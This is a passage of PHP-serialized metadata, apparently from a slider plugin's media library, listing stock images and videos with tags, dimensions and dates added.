Landscape\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:308;a:12:{s:2:\"id\";s:2:\"89\";s:6:\"handle\";s:19:\"mountain_view_4.jpg\";s:4:\"name\";s:15:\"Mountain View 4\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1203\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:309;a:13:{s:2:\"id\";s:3:\"529\";s:6:\"handle\";s:13:\"Fitness-4.jpg\";s:5:\"video\";s:13:\"Fitness-4.mp4\";s:4:\"name\";s:10:\"Fitness 4 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:310;a:13:{s:2:\"id\";s:3:\"528\";s:6:\"handle\";s:13:\"Fitness-3.jpg\";s:5:\"video\";s:13:\"Fitness-3.mp4\";s:4:\"name\";s:10:\"Fitness 3 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:311;a:13:{s:2:\"id\";s:3:\"527\";s:6:\"handle\";s:9:\"Chess.jpg\";s:5:\"video\";s:9:\"Chess.mp4\";s:4:\"name\";s:6:\"Chess \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:312;a:13:{s:2:\"id\";s:3:\"526\";s:6:\"handle\";s:13:\"Fitness-2.jpg\";s:5:\"video\";s:13:\"Fitness-2.mp4\";s:4:\"name\";s:10:\"Fitness 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:313;a:13:{s:2:\"id\";s:3:\"525\";s:6:\"handle\";s:11:\"Fitness.jpg\";s:5:\"video\";s:11:\"Fitness.mp4\";s:4:\"name\";s:8:\"Fitness \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:314;a:13:{s:2:\"id\";s:3:\"524\";s:6:\"handle\";s:9:\"Earth.jpg\";s:5:\"video\";s:9:\"Earth.mp4\";s:4:\"name\";s:6:\"Earth \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:315;a:13:{s:2:\"id\";s:3:\"523\";s:6:\"handle\";s:11:\"Space-2.jpg\";s:5:\"video\";s:11:\"Space-2.mp4\";s:4:\"name\";s:8:\"Space 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1440\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:316;a:13:{s:2:\"id\";s:3:\"522\";s:6:\"handle\";s:13:\"Asteroids.jpg\";s:5:\"video\";s:13:\"Asteroids.mp4\";s:4:\"name\";s:10:\"Asteroids \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:317;a:13:{s:2:\"id\";s:3:\"521\";s:6:\"handle\";s:9:\"Space.jpg\";s:5:\"video\";s:9:\"Space.mp4\";s:4:\"name\";s:6:\"Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:318;a:13:{s:2:\"id\";s:3:\"520\";s:6:\"handle\";s:10:\"People.jpg\";s:5:\"video\";s:10:\"People.mp4\";s:4:\"name\";s:7:\"People \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:319;a:13:{s:2:\"id\";s:3:\"519\";s:6:\"handle\";s:11:\"Walking.jpg\";s:5:\"video\";s:11:\"Walking.mp4\";s:4:\"name\";s:8:\"Walking \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:320;a:13:{s:2:\"id\";s:3:\"518\";s:6:\"handle\";s:19:\"Double-Exposure.jpg\";s:5:\"video\";s:19:\"Double-Exposure.mp4\";s:4:\"name\";s:16:\"Double Exposure \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:321;a:13:{s:2:\"id\";s:3:\"517\";s:6:\"handle\";s:8:\"Girl.jpg\";s:5:\"video\";s:8:\"Girl.mp4\";s:4:\"name\";s:5:\"Girl \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1088\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:322;a:13:{s:2:\"id\";s:3:\"516\";s:6:\"handle\";s:17:\"Bengal-Lights.jpg\";s:5:\"video\";s:17:\"Bengal-Lights.mp4\";s:4:\"name\";s:14:\"Bengal Lights \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:323;a:13:{s:2:\"id\";s:3:\"515\";s:6:\"handle\";s:13:\"Swiping-2.jpg\";s:5:\"video\";s:13:\"Swiping-2.mp4\";s:4:\"name\";s:10:\"Swiping 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:324;a:13:{s:2:\"id\";s:3:\"514\";s:6:\"handle\";s:11:\"Mock-Up.jpg\";s:5:\"video\";s:11:\"Mock-Up.mp4\";s:4:\"name\";s:8:\"Mock Up \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:325;a:13:{s:2:\"id\";s:3:\"513\";s:6:\"handle\";s:13:\"Countdown.jpg\";s:5:\"video\";s:13:\"Countdown.mp4\";s:4:\"name\";s:10:\"Countdown \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:326;a:13:{s:2:\"id\";s:3:\"512\";s:6:\"handle\";s:18:\"Wall-Sketching.jpg\";s:5:\"video\";s:18:\"Wall-Sketching.mp4\";s:4:\"name\";s:15:\"Wall Sketching \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:327;a:13:{s:2:\"id\";s:3:\"511\";s:6:\"handle\";s:26:\"Typing-on-the-keyboard.jpg\";s:5:\"video\";s:26:\"Typing-on-the-keyboard.mp4\";s:4:\"name\";s:23:\"Typing on the keyboard \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:328;a:13:{s:2:\"id\";s:3:\"510\";s:6:\"handle\";s:11:\"Meeting.jpg\";s:5:\"video\";s:11:\"Meeting.mp4\";s:4:\"name\";s:8:\"Meeting \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:329;a:13:{s:2:\"id\";s:3:\"509\";s:6:\"handle\";s:11:\"Swiping.jpg\";s:5:\"video\";s:11:\"Swiping.mp4\";s:4:\"name\";s:8:\"Swiping \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:330;a:13:{s:2:\"id\";s:3:\"508\";s:6:\"handle\";s:9:\"Alarm.jpg\";s:5:\"video\";s:9:\"Alarm.mp4\";s:4:\"name\";s:6:\"Alarm \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1013\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:331;a:13:{s:2:\"id\";s:3:\"507\";s:6:\"handle\";s:13:\"Hey-World.jpg\";s:5:\"video\";s:13:\"Hey-World.mp4\";s:4:\"name\";s:10:\"Hey World \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:332;a:13:{s:2:\"id\";s:3:\"506\";s:6:\"handle\";s:28:\"Typing-on-the-keyboard-2.jpg\";s:5:\"video\";s:28:\"Typing-on-the-keyboard-2.mp4\";s:4:\"name\";s:25:\"Typing on the keyboard 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:333;a:13:{s:2:\"id\";s:3:\"505\";s:6:\"handle\";s:10:\"Valley.jpg\";s:5:\"video\";s:10:\"Valley.mp4\";s:4:\"name\";s:7:\"Valley \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:334;a:13:{s:2:\"id\";s:3:\"504\";s:6:\"handle\";s:9:\"Stars.jpg\";s:5:\"video\";s:9:\"Stars.mp4\";s:4:\"name\";s:6:\"Stars \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:335;a:13:{s:2:\"id\";s:3:\"503\";s:6:\"handle\";s:21:\"Car-in-the-forest.jpg\";s:5:\"video\";s:21:\"Car-in-the-forest.mp4\";s:4:\"name\";s:18:\"Car in the forest \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1012\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:336;a:13:{s:2:\"id\";s:3:\"502\";s:6:\"handle\";s:15:\"Aerial-Shot.jpg\";s:5:\"video\";s:15:\"Aerial-Shot.mp4\";s:4:\"name\";s:12:\"Aerial Shot \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:337;a:13:{s:2:\"id\";s:3:\"501\";s:6:\"handle\";s:14:\"Disco-Ball.jpg\";s:5:\"video\";s:14:\"Disco-Ball.mp4\";s:4:\"name\";s:11:\"Disco Ball \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:338;a:13:{s:2:\"id\";s:3:\"500\";s:6:\"handle\";s:22:\"Man-Playing-Guitar.jpg\";s:5:\"video\";s:22:\"Man-Playing-Guitar.mp4\";s:4:\"name\";s:19:\"Man Playing Guitar \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:339;a:13:{s:2:\"id\";s:3:\"499\";s:6:\"handle\";s:14:\"Live-Music.jpg\";s:5:\"video\";s:14:\"Live-Music.mp4\";s:4:\"name\";s:11:\"Live Music \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:340;a:13:{s:2:\"id\";s:3:\"498\";s:6:\"handle\";s:12:\"Cheer-Up.jpg\";s:5:\"video\";s:12:\"Cheer-Up.mp4\";s:4:\"name\";s:9:\"Cheer Up \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:341;a:13:{s:2:\"id\";s:3:\"497\";s:6:\"handle\";s:14:\"Night-club.jpg\";s:5:\"video\";s:14:\"Night-club.mp4\";s:4:\"name\";s:11:\"Night club \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:342;a:13:{s:2:\"id\";s:3:\"496\";s:6:\"handle\";s:17:\"Cup-Of-Coffee.jpg\";s:5:\"video\";s:17:\"Cup-Of-Coffee.mp4\";s:4:\"name\";s:14:\"Cup Of Coffee \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:343;a:13:{s:2:\"id\";s:3:\"495\";s:6:\"handle\";s:7:\"Pot.jpg\";s:5:\"video\";s:7:\"Pot.mp4\";s:4:\"name\";s:4:\"Pot \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:344;a:13:{s:2:\"id\";s:3:\"494\";s:6:\"handle\";s:11:\"Grill-2.jpg\";s:5:\"video\";s:11:\"Grill-2.mp4\";s:4:\"name\";s:8:\"Grill 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:345;a:13:{s:2:\"id\";s:3:\"493\";s:6:\"handle\";s:13:\"Rice-Bowl.jpg\";s:5:\"video\";s:13:\"Rice-Bowl.mp4\";s:4:\"name\";s:10:\"Rice Bowl \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1010\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:346;a:13:{s:2:\"id\";s:3:\"492\";s:6:\"handle\";s:9:\"Grill.jpg\";s:5:\"video\";s:9:\"Grill.mp4\";s:4:\"name\";s:6:\"Grill \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:347;a:13:{s:2:\"id\";s:3:\"491\";s:6:\"handle\";s:9:\"Water.jpg\";s:5:\"video\";s:9:\"Water.mp4\";s:4:\"name\";s:6:\"Water \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:348;a:13:{s:2:\"id\";s:3:\"490\";s:6:\"handle\";s:17:\"Feet-and-Sand.jpg\";s:5:\"video\";s:17:\"Feet-and-Sand.mp4\";s:4:\"name\";s:14:\"Feet and Sand \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 